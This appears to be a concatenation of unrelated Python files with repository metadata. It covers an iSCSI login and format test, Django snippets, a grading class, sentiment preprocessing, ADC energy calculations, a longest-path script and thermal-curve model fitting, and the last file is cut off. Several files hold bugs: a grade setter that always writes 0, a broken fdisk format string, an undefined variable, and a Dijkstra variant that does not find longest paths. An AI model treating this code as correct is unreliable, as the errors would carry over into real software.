%(x)])) ### iscsi volume login successfull if output[0] == "PASSED": print "Negative testcase-iscsi volume %s login passed on the client with dummy iqn and ip, test case failed" %(config['voliSCSIDatasetname%d' %(x)]) endTime = ctime() resultCollection("Negative testcase-iscsi volume %s login passed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime) ### iscsi volume login unsuccessfull else: print "Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip, testcase passed" %(config['voliSCSIDatasetname%d' %(x)]) endTime = ctime() resultCollection("Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime) # for positive testcase else: ###no iscsi volumes discovered if iqnname==[]: print "iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]) endTime = ctime() resultCollection("iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime) ### some iscsi volumes discovered else: output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --login | grep Login' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)])) ### iscsi volume login successfull if output[0] == "PASSED": print "iscsi volume %s login passed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]) endTime = ctime() resultCollection("iscsi volume %s login passed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime) #### if login successfull mount and copy some data device = getoutput('iscsiadm -m session -P3 | grep \'Attached scsi disk\' | awk {\'print $4\'}') device2 = (device[0].split('\n'))[0] executeCmd('fdisk /dev/%s < fdisk_response_file' (device2)) executeCmd('mkfs.ext3 /dev/%s1' %(device2)) executeCmd('mount /dev/%s1 mount/%s' %(device2, config['voliSCSIMountpoint%d' %(x)])) executeCmd('cp testfile mount/%s' %(config['voliSCSIMountpoint%d' %(x)])) output=executeCmd('diff testfile mount/%s' %(config['voliSCSIMountpoint%d' %(x)])) if output[0] == "PASSED": endtime = ctime() resultCollection("Creation of File on ISCSI Volume %s passed on the client with iqn and ip credentials" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime) else: endtime = ctime() resultCollection("Creation of File on ISCSI Volume %s passed on the client with iqn and ip credentials" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime) ### iscsi volume login unsuccessfull else: print "iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]) endTime = ctime() resultCollection("iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime) ### logout output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --logout | grep Logout' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
b799cd1b2094b8b6d385a69a3678787901adbe06
471e1738186b51373aa73057d91bbdb2575be6d6
/anuario/pesquisador/admin.py
fd6fa9091a51a4000f772d4e4fb55386e31f74a4
[]
no_license
pixies/portal-anuario-pesquisa
1939c074ba9a70d715c0c48b07741364161a77b8
38873ec820ac75977ba2f989b1a472e1b9c62a4a
refs/heads/master
2021-01-12T17:49:37.337465
2016-09-29T17:10:05
2016-09-29T17:10:05
69,398,984
0
0
null
2016-09-27T21:11:15
2016-09-27T21:11:15
null
UTF-8
Python
false
false
209
py
from django.contrib import admin from .models import Pesquisador, Curso, Instituicao # Register your models here. admin.site.register(Pesquisador) #admin.site.register(Curso) #admin.site.register(Instituicao)
580dbd15bf43272f28e3f9bd42413a905510cd76
bef304291f5fe599f7a5b713d19544dc0cecd914
/todoapp/todo_list/forms.py
9fe1a617dd0f429fc6c8b3c1fa6885fee975c262
[]
no_license
coderj001/django-todo-and-air-quality
9ca847143ea86677a0d54026c060638fabf8c042
012ee15fa3cfbf1aa08ae4513c3bf4fa828b3ba3
refs/heads/master
2020-12-14T20:20:49.845722
2020-01-19T15:06:42
2020-01-19T15:06:42
234,855,834
0
1
null
null
null
null
UTF-8
Python
false
false
147
py
from django import forms from .models import ToDoList class ListForm(forms.ModelForm): class Meta: model=ToDoList fields=['item','completed']
b9f5b0e85ced88524ab8f2e59229df6b0f93c821
e60a342f322273d3db5f4ab66f0e1ffffe39de29
/parts/zodiac/chameleon/__init__.py
60fbbb344ac3c226ff2ca2148893e72d3fc26add
[]
no_license
Xoting/GAExotZodiac
6b1b1f5356a4a4732da4c122db0f60b3f08ff6c1
f60b2b77b47f6181752a98399f6724b1cb47ddaf
refs/heads/master
2021-01-15T21:45:20.494358
2014-01-13T15:29:22
2014-01-13T15:29:22
null
0
0
null
null
null
null
UTF-8
Python
false
false
75
py
/home/alex/myenv/zodiac/eggs/Chameleon-2.13-py2.7.egg/chameleon/__init__.py
d57c68ff01ec5c6b974091d91da38f8ac7708ec3
26371093460ea3026cdcd74e624b0c2d4b1d5892
/Staff.py
2fae3241689d94a0185840d38b2a6b21e9b9a6a3
[]
no_license
meyerkeaton/ktmcbk
0b636b1bc8e8be022f6423d88776191a606949c7
5bca15495ee1066658c59ae24c15be4028f8a4ff
refs/heads/main
2022-12-28T05:41:09.453076
2020-10-15T05:09:20
2020-10-15T05:09:20
304,215,581
0
0
null
null
null
null
UTF-8
Python
false
false
883
py
import json import User class Staff(User.User): def update_course_db(self): with open('Data/courses.json', 'w') as fp: json.dump(self.all_courses, fp) def create_assignment(self,assignment_name, due_date, course): assignment = { assignment_name: { 'due_date': due_date } } self.all_courses[course]['assignments'].update(assignment) self.update_course_db() def change_grade(self,user,course,assignment,grade): self.users[user]['courses'][course][assignment]['grade'] = 0 self.update_user_db() def check_grades(self,name,course): assignments = self.users[name]['courses'][course] grades = [] for key in assignments: grades.append([key, assignments[key]['grade']]) return grades
75d75f75c5dfebdcd52ba31013c836708232536a
6e68d7f4bbd2cf2ecad7cdf6bbd07d6687f2685c
/preprocessing.py
a406884f0db4f90c620feac07d8ce7282e1b221b
[]
no_license
AbhinavJindl/sentiment_analysis
bd5a08345913d92cd5be0e61fe5095e196fb9d49
b2154a89f3c0bfa89318e8d280734ed25af1cc5f
refs/heads/master
2020-03-27T20:41:28.945916
2018-09-02T13:55:07
2018-09-02T13:55:07
147,086,857
0
0
null
null
null
null
UTF-8
Python
false
false
3,108
py
import random import pickle no_words = 5000 no_reviews = 1000 no_validation=1000 no_test=1000 forest_trees=50 forest_tree_features=2000 def add_noice(review_list_pos,review_list_neg,p): n=int((p/100)*len(review_list)/2) random.sample(review_list,n) def load(filename): file = open(filename,'rb') obj=pickle.load(file) file.close() return obj def save(obj,filename): file=open(filename,'wb') pickle.dump(obj,file) file.close() #returns a dictionary for a review given string def list_review(s,indexlist): dic = {} tokens=s.split(" ") dic['sentiment']=int(tokens[0]) dic['list']=[] for i in range(1,len(tokens)): t=tokens[i].split(":") if int(t[0]) in indexlist: dic['list'].append(int(t[0])) return dic def preprocess(): wordsfile = open('aclImdb_v1/aclImdb/imdb.vocab','r',encoding='utf-8') valuefile = open('aclImdb_v1/aclImdb/imdbEr.txt','r',encoding='utf-8') count=0 words_i=[] for line in valuefile: linetoken=line.split('\n') current=(count, float(linetoken[0])) words_i.append(current) count=count+1 words_i= sorted(words_i,key=lambda x: x[1]) indexlist=[] for i in range(int(no_words/2)): indexlist.append(words_i[i][0]) indexlist.append(words_i[-i][0]) indexlist= sorted(indexlist) forest_index_lists=[] for i in range(forest_trees): forest_index_lists.append(random.sample(indexlist,forest_tree_features)) reviewsfile = open('aclImdb_v1/aclImdb/train/labeledBow.feat','r',encoding='utf-8') full_review_list = reviewsfile.readlines(); random_list_pos = random.sample(range(0,int(len(full_review_list)/2)),int(no_reviews/2)) random_list_neg = random.sample(range(int(len(full_review_list)/2),len(full_review_list)),int(no_reviews/2)) review_list={} for i in random_list_pos: review_list[i]=list_review(full_review_list[i],indexlist) for i in random_list_neg: review_list[i]=list_review(full_review_list[i],indexlist) testfile = open('aclImdb_v1/aclImdb/test/labeledBow.feat','r',encoding='utf-8') test_review_list=testfile.readlines() validation_list_pos=random.sample(range(0,int(len(full_review_list)/2)),int(no_validation/2)) validation_list_neg= random.sample(range(int(len(full_review_list)/2),len(full_review_list)),int(no_validation/2)) validation_list = validation_list_pos+validation_list_neg validation_reviews={} for i in validation_list: validation_reviews[i]=list_review(full_review_list[i],indexlist) test_list_pos=random.sample(range(0,int(len(test_review_list)/2)),int(no_test/2)) test_list_neg= random.sample(range(int(len(test_review_list)/2),len(test_review_list)),int(no_test/2)) test_list=test_list_neg+test_list_pos test_reviews={} for i in test_list: test_reviews[i]=list_review(test_review_list[i],indexlist) save(validation_reviews,'validationreviews.pkl') save(validation_list,'validationlist.pkl') save(test_reviews,'testreviews.pkl') save(test_list,'testlist.pkl') save(random_list_pos,'randompos.pkl') save(random_list_neg,'randomneg.pkl') save(review_list,'reviewlist.pkl') save(indexlist,'indexlist.pkl') if __name__=="__main__": preprocess()
6b2843c0a678ffe8be10b0d147adee1740dc58da
a5f8eb72e680a906f74ae53d2b6428fbb008320c
/31-zip.py
a48620bb23a58f1ecfdebf53d239f9cf71d077e5
[]
no_license
arn1992/Basic-Python
0588858aed632ac9e65e5618d5b57bcbe71c45bc
09b9bf2364ddd2341f95445e18868e2e0904604d
refs/heads/master
2020-06-28T18:35:32.394730
2016-12-15T07:21:33
2016-12-15T07:21:33
74,483,622
1
0
null
null
null
null
UTF-8
Python
false
false
127
py
first=['ratul','aminur','arn'] last=['tasneem','ishrar'] names=zip(first,last) for a,b in names: print(a,b)
d8aac991213a5218618098233100d5a23603c036
9d48dc6e54f959285ed3ab15006d664d42db7c01
/assistant_module/get_energy.py
17e7b4311937c5f4041a66ce17b38da77f929ad5
[]
no_license
sandylaker/saradc_toolbox
d971936ec5b13fb467f991b351b30fccad00876a
b7b8f3d6c15a7c522cd89267739318c78e4d6a37
refs/heads/master
2020-03-27T11:42:29.520183
2018-09-15T21:03:47
2018-09-15T21:03:47
146,503,308
2
0
null
null
null
null
UTF-8
Python
false
false
12,098
py
import numpy as np from assistant_module.get_decision_path import get_decision_path def get_energy(n, switch='conventional', structure='conventional'): """ get the energy consumption of every code, each code represents the possible decision level before the last decision(a odd decimal integer). :param n: resolution of DAC :param switch: switching method: 'conventional': conventional one-step switching 'monotonic': monotonic capacitor switching, in each transition step, only one capacitor in one side is switched. 'mcs': merged capacitor switching 'split': split-capacitor method. The MSB capacitor is split into a copy of the rest of the capacitor array. When down-switching occurs, only the corresponding capacitor in the sub-capacitor array is discharged to the ground :param structure: structure of ADC: 'conventional': conventional single-ended structure 'differential': has two arrays of capacitors, the switch states of positive and negative side are complementary. The energy consumption is two times of that in the conventional structure, if conventional switching method is used. :return: a ndarray, each element represents the energy consumption of each code. """ # possible decision level before the last comparision code_decimal = np.arange(1, 2 ** n, 2) decision_path = get_decision_path(n) # two-dimensional # store the switching energy of each code sw_energy_sum = np.zeros(len(code_decimal)) if switch == 'conventional': coefficient = 1 if structure == 'differential': # the switching states of both sides are complementary, so that the energy consumption is two times of # that in conventional(single-ended) structure. coefficient = 2 for i in range(len(code_decimal)): # weight of each decision threshold layer weights_ideal = [0.5 ** (i + 1) for i in range(n)] sw_energy = np.zeros(n) sw_energy[0] = 0.5 * decision_path[i, 0] # calculate the energy for up-switching steps # 1 is the index offset sw_up_pos = np.where( decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1 # print(code_decimal[i],' sw_up_pos: ',sw_up_pos) if not sw_up_pos.size == 0: # sw_energy[sw_up_pos] = decision_path[i,sw_up_pos]*(-1)*(weights_ideal[sw_up_pos])+ 2**(n-1-sw_up_pos) # 2**(n-1-sw_up_pos) stands for E_sw = C_up*V_ref^2 for k in sw_up_pos: # \delta V_x is positive,so *(-1) sw_energy[k] = decision_path[i, k] * \ (-1) * (weights_ideal[k]) + 2**(n - 1 - k) sw_dn_pos = np.where( decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1 # print(code_decimal[i],' sw_dn_pos: ',sw_dn_pos) if not sw_dn_pos.size == 0: # sw_energy[sw_dn_pos] = decision_path[i,sw_dn_pos]*(-1)*(weights_ideal[sw_dn_pos]) + 2**(n-1-sw_dn_pos) for k in sw_dn_pos: sw_energy[k] = decision_path[i, k] * \ (weights_ideal[k]) + 2**(n - 1 - k) # print(code_decimal[i],': ',sw_energy) sw_energy_sum[i] = np.sum(sw_energy) return coefficient * sw_energy_sum if switch == 'monotonic': if structure == 'conventional': raise Exception( 'Conventional(single-ended) structure does not support monotonic switching.') for i in range(len(code_decimal)): # the total capacitance of positive and negative sides c_tp = c_tn = 2 ** (n - 1) # vx unchanged in the first step weights_ideal = np.concatenate( ([0], [0.5 ** j for j in range(1, n)])) sw_energy = np.zeros(n) sw_energy[0] = 0 # define an array to store the switching types(up or down) of each # step. sw_process = np.zeros(n) # find the up-switching and down-switching steps # 1 is the index offset sw_up_pos = np.where( decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1 sw_dn_pos = np.where( decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1 sw_process[sw_up_pos], sw_process[sw_dn_pos] = 1, 0 for k in range(1, n): # if up-switching occurs, a capacitor of the p-side will be connected to the ground while n-side remains # unchanged; if down-switching occurs, a capacitor of n -side will be connected to the ground while # p-side remains unchanged. Attention: here is the range(1,n), when k starts from 1, the first # capacitor switched to the ground is 2**(n-2)*C0 ( the MSB capacitor differs from which in the # conventional case. c_tp = c_tp - 2**(n - 1 - k) * sw_process[k] c_tn = c_tn - 2**(n - 1 - k) * (1 - sw_process[k]) sw_energy[k] = c_tp * (-1) * (- weights_ideal[k]) * sw_process[k] + \ c_tn * (-1) * (- weights_ideal[k]) * (1 - sw_process[k]) sw_energy_sum[i] = np.sum(sw_energy) return sw_energy_sum if switch == 'mcs': if structure == 'conventional': raise Exception( 'Conventional(single-ended) structure does not support monotonic switching.') weights_ideal = np.concatenate( ([0.5 ** j for j in range(1, n)], [0.5 ** (n - 1)])) cap_ideal = np.concatenate( ([2 ** (n - 2 - j) for j in range(n - 1)], [1])) for i in range(len(code_decimal)): sw_energy = np.zeros(n) # find the up-switching and down-switching steps # 1 is the index offset sw_up_pos = np.where( decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1 sw_dn_pos = np.where( decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1 # connection of bottom plates of positive and negative capacitor arrays. # at the sampling phase, all the bottom plates are connected to Vcm # = 0.5* Vref cap_connect_p = np.full((n, n), 0.5) cap_connect_n = np.full((n, n), 0.5) # define an array to store the switching types(up or down) of each # step. sw_process = np.zeros(n) sw_process[sw_up_pos], sw_process[sw_dn_pos] = 1.0, 0 # store the v_x of both sides in each step, here the term v_ip and # v_in are subtracted. v_xp = np.zeros(n) v_xn = np.zeros(n) # store the voltage difference between the plates of each capacitor in each step, here the term v_ip- v_cm # and v_in - v_cm are subtracted, because when calculating the change of v_cap, these terms are constant and # so eliminated. v_cap_p = np.zeros((n, n)) v_cap_n = np.zeros((n, n)) for k in range(1, n): # update the connections of bottom plates cap_connect_p[k:, k - 1], cap_connect_n[k:, k - 1] = 1 - sw_process[k], sw_process[k] v_xp[k] = np.inner(cap_connect_p[k], weights_ideal) v_xn[k] = np.inner(cap_connect_n[k], weights_ideal) # calculate the voltage across the top and bottom plates of # capacitors v_cap_p[k] = v_xp[k] - cap_connect_p[k] v_cap_n[k] = v_xn[k] - cap_connect_n[k] # find index of the capacitors connected to the reference # voltage c_tp_index = np.where(cap_connect_p[k] == 1.0)[0] c_tn_index = np.where(cap_connect_n[k] == 1.0)[0] # energy = - V_ref * ∑(c_t[j] * ∆v_cap[j]) sw_energy_p = - \ np.inner(cap_ideal[c_tp_index], (v_cap_p[k, c_tp_index] - v_cap_p[k - 1, c_tp_index])) sw_energy_n = - \ np.inner(cap_ideal[c_tn_index], (v_cap_n[k, c_tn_index] - v_cap_n[k - 1, c_tn_index])) sw_energy[k] = sw_energy_p + sw_energy_n sw_energy_sum[i] = np.sum(sw_energy) return sw_energy_sum if switch == 'split': coefficient = 1 if structure == 'differential': coefficient = 2 if n < 2: raise Exception( "Number of bits must be greater than or equal to 2. ") # capacitor array, cap_ideal has the shape of (2,n), in which the first row is the sub-capacitor array of the # MSB capacitor, the second row is the main capacitor array(excluding # the MSB capacitor) cap_ideal = np.repeat(np.concatenate( ([2**(n - 2 - i) for i in range(n - 1)], [1]))[np.newaxis, :], 2, axis=0) weights_ideal = cap_ideal / (2**n) for i in range(len(code_decimal)): sw_energy = np.zeros(n) sw_energy[0] = 0.5 * decision_path[i, 0] # find the up-switching and down-switching steps # 1 is the index offset sw_up_pos = np.where( decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1 sw_dn_pos = np.where( decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1 # define an array to store the switching types(up or down) of each # step. sw_process = np.zeros(n) sw_process[sw_up_pos], sw_process[sw_dn_pos] = 1.0, 0 # store the bottom plates connection in each step cap_connect = np.repeat( np.vstack( (np.ones(n), np.zeros(n)))[ np.newaxis, :, :], n, axis=0) # store the voltage at X point ,here the term v_cm - v_in is # subtracted v_x = np.zeros(n) v_x[0] = np.sum(np.multiply(weights_ideal, cap_connect[0])) # the voltage between top plates and bottom plates v_cap = np.zeros((n, 2, n)) v_cap[0] = v_x[0] - cap_connect[0] for k in range(1, n): # if up-switching: the capacitor with index k-1 in the main capacitor array will be charged to V_ref, # and the capacitor with same index remains charged to V_ref; if down-switching: the capacitor # with index k-1 in the sub-capacitor array will be discharged to ground, and the capacitor with the # same index remains discharged. cap_connect[k:, :, k - 1] = sw_process[k] v_x[k] = np.sum(np.multiply(weights_ideal, cap_connect[k])) v_cap[k] = v_x[k] - cap_connect[k] # find index of the capacitors charged to the reference # voltage c_t_index = np.where( cap_connect[k] == 1.0) # 2-dimensional index # energy = - V_ref * ∑(c_t[j] * ∆v_cap[j]) # attention that v_cap is 3d-array, the the slicing index # should also be 3-dimensional sw_energy[k] = - np.inner(cap_ideal[c_t_index], (v_cap[k,c_t_index[0], c_t_index[-1]] - v_cap[k - 1, c_t_index[0], c_t_index[-1]])) sw_energy_sum[i] = np.sum(sw_energy) return coefficient * sw_energy_sum
8c933fd456834988004265d8cb6e1a7801ec7b35
b013eb7ffc0c41e874c04a55065de96a9313ab17
/longest_path1.py
f3d3b164a7b8e8b0244d280f07fd701a95f4287a
[]
no_license
YuiGao/shortest_longest_path
69fcf5724cfb03e7a94f33b507fa25e7c41f69ed
111d85c2fa090b497cc2896ddf644a21ffc4e69f
refs/heads/master
2020-05-07T19:29:09.282219
2019-04-11T14:54:47
2019-04-11T14:54:47
180,815,191
0
0
null
null
null
null
UTF-8
Python
false
false
2,509
py
nodes = ('A', 'B', 'C', 'D', 'E', 'F', 'G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') distances = { 'A':{'B':5,'C':6,'D':4,'E':7}, 'B':{'A':5,'F':2,'G':3}, 'C':{'A':6,'F':6,'G':4,'H':1}, 'D':{'A':4,'G':7,'H':3,'I':6}, 'E':{'A':7,'H':9,'I':1}, 'F':{'B':2,'C':6,'J':2,'K':3}, 'G':{'B':3,'C':4,'D':7,'J':6,'K':4,'L':1}, 'H':{'C':1,'D':3,'E':9,'K':7,'L':3,'M':6}, 'I':{'D':6,'E':1,'L':9,'M':7}, 'J':{'F':2,'G':6,'N':2,'O':3}, 'K': {'F': 3, 'G': 4, 'H': 7, 'N': 6, 'O': 4, 'P': 1}, 'L': {'G': 1, 'H': 3, 'I': 9, 'O': 7, 'P': 10, 'Q': 6}, 'M': {'H': 6, 'I': 7, 'P': 9, 'Q': 8}, 'N': {'J': 2, 'K': 6, 'R': 2, 'S': 3}, 'O': {'J': 3, 'K': 4, 'L': 7, 'R': 6, 'S': 4, 'T': 1}, 'P': {'K': 1, 'L': 10, 'M': 9, 'S': 7, 'T': 3, 'U': 6}, 'Q': {'L': 6, 'M': 8, 'T': 9, 'U': 1}, 'R': {'N': 2, 'O': 6, 'V': 2, 'W': 3}, 'S': {'N': 3, 'O': 4, 'P': 7, 'V': 6, 'W': 4, 'X': 1}, 'T': {'O': 1, 'P': 3, 'Q': 9, 'W': 7, 'X': 3, 'Y': 6}, 'U': {'P': 6, 'Q': 1, 'X': 9, 'Y': 1}, 'V': {'R': 2, 'S': 6, 'Z': 5}, 'W': {'R': 3, 'S': 4, 'T': 7, 'Z': 6}, 'X': {'S': 1, 'T': 3, 'U': 9, 'Z': 4}, 'Y': {'T': 6, 'U': 1, 'Z': 7}, 'Z': {'V': 5, 'W': 6, 'X': 4, 'Y': 7} } unvisited = {node: None for node in nodes} #把None作为无穷大使用 visited = {}#用来记录已经松弛过的数组 current = 'A' #要找A点到其他点的距离 currentDistance = 0 unvisited[current] = currentDistance#A到A的距离记为0 while True: for neighbour, distance in distances[current].items(): if neighbour not in unvisited: continue#被访问过了,跳出本次循环 newDistance = currentDistance + distance#新的距离 if unvisited[neighbour] is None or unvisited[neighbour] < newDistance:#如果两个点之间的距离之前是无穷大或者新距离小于原来的距离 unvisited[neighbour] = newDistance#更新距离 visited[current] = currentDistance#这个点已经松弛过,记录 del unvisited[current]#从未访问过的字典中将这个点删除 if not unvisited: break#如果所有点都松弛过,跳出此次循环 candidates = [node for node in unvisited.items() if node[1]]#找出目前还有拿些点未松弛过 current, currentDistance = sorted(candidates, key = lambda x: x[1])[0]#找出目前可以用来松弛的点 if(current == "Z"): print('Start-End最长路径长度为:',currentDistance)
8e1418e4e26d871472531d0c334592b6736bee75
07f37b31c48ae80d32831fe6eb3f58b2e9f9a0f0
/tpcfit/models.py
872bf6829ff506949e0289d4396550c3a78be115
[]
no_license
hjosullivan/CMEEProject
2dcf970f2be47b43c81b78ac9dc754ef96199663
ee3dc452d9d61734f41eff94e2f4d0d896ed0cbe
refs/heads/master
2022-08-26T12:49:52.615471
2019-08-29T14:31:41
2019-08-29T14:31:41
160,700,900
0
0
null
2022-08-23T17:33:45
2018-12-06T16:20:56
Python
UTF-8
Python
false
false
18,125
py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ models.py contains all available mathematical models to be fitted to thermal performance curves. NOTE: Currently only Sharpe-Schoolfield variants """ import numpy as np from lmfit import minimize, Minimizer, Parameters class ThermalModelsException(Exception): """ General purpose exception generator for ThermalModels""" def __init__(self, msg): Exception.__init__(self) self.msg = msg def __str__(self): return "{}".format(self.msg) class ThermalModels(object): """ Class containing thermal models for fitting """ # Set some useful class variables # Bolzmann's constant k = 8.617 * 10 ** (-5) # Reference temperature (20 degrees C) Tref = 283.15 # Set some useful error messages _err_novals = ("Please supply input data for model fitting.") _err_nonparam = ("Supplied parameters must be an instance of lmfit.parameter.Parameter or tpcfit.starting_parameters.StartParams") _err_temperror = ("Temperature vector must be of type numpy.ndarray.") _err_traiterror = ("Trait vector must be of type numpy.ndarray.") _err_zero_neg_vals = ("Zero or negative values not accepted. Please supply positive values only.") def __init__(self, temps=None, traits=None, fit_pars=None): if temps is not None: self.temps = temps if not isinstance(temps, np.ndarray): raise ThermalModelsException(self._err_temperror) if self.temps is None: raise ThermalModelsException(self._err_novals) elif np.min(self.temps) < 0: raise ThermalModelsException(self._err_temperror) if traits is not None: self.traits = traits if not isinstance(traits, np.ndarray): raise ThermalModelsException(self._err_traiterror) if self.traits is None: raise ThermalModelsException(self._err_novals) elif np.min(self.traits) < 0: raise ThermalModelsException(self._err_traiterror) if fit_pars is not None: self.fit_pars = fit_pars if not isinstance(fit_pars, Parameters): self.fit_pars = self.fit_pars.gauss_params #raise ThermalModelsException(self._err_nonparam) elif self.fit_pars is None: raise ThermalModelsException(self._err_novals) @classmethod def set_Tref(cls, Tref_val): """ Allow user to set their own reference temperature """ cls.Tref = Tref_val class SharpeSchoolfieldFull(ThermalModels): model_name = "sharpeschoolfull" def __init__(self, temps, traits, fit_pars): super().__init__(temps, traits, fit_pars) self.ssf_model = self.fit_ssf(temps, traits, fit_pars) if self.ssf_model is not None: # Return fitted trait values self.ssf_fits = self.ssf_fitted_vals(self.ssf_model) # Return parameter estimates from the model self.final_estimates = self.ssf_estimates(self.ssf_model) # Return initial parameter values supplied to the model self.initial_params = self.ssf_init_params(self.ssf_model) # Return AIC score self.AIC = self.ssf_aic(self.ssf_model) def ssf_fcn2min(self, temps, traits, fit_pars): """ Function to be minimized Parameters ---------- temps: numpy array Temperature array in Kelvin traits: numpy array Trait array params: lmfit.parameter.Parameters Dictionary of parameters to fit full schoolfield model Returns ------- ssf_fcn2min: callable Fitting function to be called by the optimizer - producing an array of residuals (difference between model and data) """ # Set parameter values B0 = self.fit_pars["B0"].value E = self.fit_pars["E"].value Eh = self.fit_pars["Eh"].value El = self.fit_pars["El"].value Th = self.fit_pars["Th"].value Tl = self.fit_pars["Tl"].value # Eh must be greater than Eh if E >= Eh: return 1e10 # TH must be greater than Tl if Th < (Tl + 1): Th = Tl + 1 # And Tl must be less than Th if Tl > Th - 1: Tl = Th - 1 model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / ((1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps))))) + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps)))))) # Return residual array return np.array(np.exp(model) - self.traits) def ssf_fitted_vals(self, ssf_model): """ Called by a fit model only: A function to estimate the trait value at a given temperature according to the Sharpe-Schoolfield model Parameters ---------- ssf_model: lmfit.MinimizerResult Minimizer result of a successful fit Returns ------- ssf_fits: numpy array Fitted trait values """ # Get best-fit model parameters B0 = self.ssf_model.params["B0"].value E = self.ssf_model.params["E"].value Eh = self.ssf_model.params["Eh"].value El = self.ssf_model.params["El"].value Th = self.ssf_model.params["Th"].value Tl = self.ssf_model.params["Tl"].value # Define model model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / ((1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps))))) + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps)))))) # Get untransformed fitted values self.ssf_fits = np.array(np.exp(model)) return self.ssf_fits def fit_ssf(self, temps, traits, fit_pars): """ Fitting function for schoolfield full model Parameters ---------- fcn2min: callable function to be minimized by the optimizer params: Parameter object Dictionary of parameters to fit full schoolfield model temps: numpy array Temperature array in Kelvin traits: numpy array Trait array Returns ------- ssf_model: lmfit.MinimizerResult Model result object """ # Log trait values self.traits = np.log(self.traits) # Minimize model try: self.ssf_model = minimize(self.ssf_fcn2min, self.fit_pars, args=(self.temps, self.traits), xtol = 1e-12, ftol = 1e-12, maxfev = 100000) except Exception: return None return self.ssf_model def ssf_estimates(self, ssf_model): """ Get parameter estimtes from the model Parameters ---------- ssf_model : lmfit.MinimizerResult A successful model result Returns ------- final_estimates: dict Dictionary of final fitted parameters from the model """ self.final_estimates = self.ssf_model.params.valuesdict() return self.final_estimates def ssf_init_params(self, ssf_model): """ Get parameter estimtes from the model Parameters ---------- ssf_model : lmfit.MinimizerResult A successful model result Returns ------- initial_params: dict Dictionary of initial parameters supplied to the model """ self.initial_params = self.ssf_model.init_values return self.initial_params def ssf_aic(self,ssf_model): """ Get model AIC score Parameters ---------- ssf_model : lmfit.MinimizerResult A successful model result Returns ------- AIC: int AIC score from fitted model """ self.AIC = self.ssf_model.aic return self.AIC def __repr__(self): pass # readable representation of the object (for user) def __str__(self): pass class SharpeSchoolfieldHigh(ThermalModels): model_name = "sharpeschoolhigh" def __init__(self, temps, traits, fit_pars): super().__init__(temps, traits, fit_pars) self.ssh_model = self.fit_ssh(temps, traits, fit_pars) if self.ssh_model is not None: # Return fitted trait values self.ssh_fits = self.ssh_fitted_vals(self.ssh_model) # Return parameter estimates from the model self.final_estimates = self.ssh_estimates(self.ssh_model) # Return initial parameter values supplied to the model self.initial_params = self.ssh_init_params(self.ssh_model) # Return AIC score self.AIC = self.ssh_aic(self.ssh_model) def ssh_fcn2min(self, temps, traits, fit_pars): """ Function to be minimized Parameters ---------- temps: numpy array Temperature array in Kelvin traits: numpy array Trait array params: lmfit.parameter.Parameters Dictionary of parameters to fit full schoolfield model Returns ------- ssh_fcn2min: callable Fitting function to be called by the optimizer - producing an array of residuals (difference between model and data) """ # Set parameter values B0 = self.fit_pars["B0"].value E = self.fit_pars["E"].value Eh = self.fit_pars["Eh"].value Th = self.fit_pars["Th"].value # Eh must be greater than Eh if E >= Eh: return 1e10 model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps)))))) # Return residual array return np.array(np.exp(model) - self.traits) def ssf_fitted_vals(self, ssh_model): """ Called by a fit model only: A function to estimate the trait value at a given temperature. Parameters ---------- ssf_model: lmfit.MinimizerResult Minimizer result of a successful fit Returns ------- ssh_fits: numpy array Fitted trait values """ # Get best-fit model parameters B0 = self.ssh_model.params["B0"].value E = self.ssh_model.params["E"].value Eh = self.ssh_model.params["Eh"].value Th = self.ssh_model.params["Th"].value # Define model model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps)))))) # Get untransformed fitted values self.ssh_fits = np.array(np.exp(model)) return self.ssh_fits def fit_ssh(self, temps, traits, fit_pars): """ Fitting function for schoolfield full model Parameters ---------- fcn2min: callable function to be minimized by the optimizer params: Parameter object Dictionary of parameters to fit full schoolfield model temps: numpy array Temperature array in Kelvin traits: numpy array Trait array Returns ------- ssf_model: lmfit.MinimizerResult Model result object """ # Log trait values self.traits = np.log(self.traits) # Minimize model try: self.ssh_model = minimize(self.ssh_fcn2min, self.fit_pars, 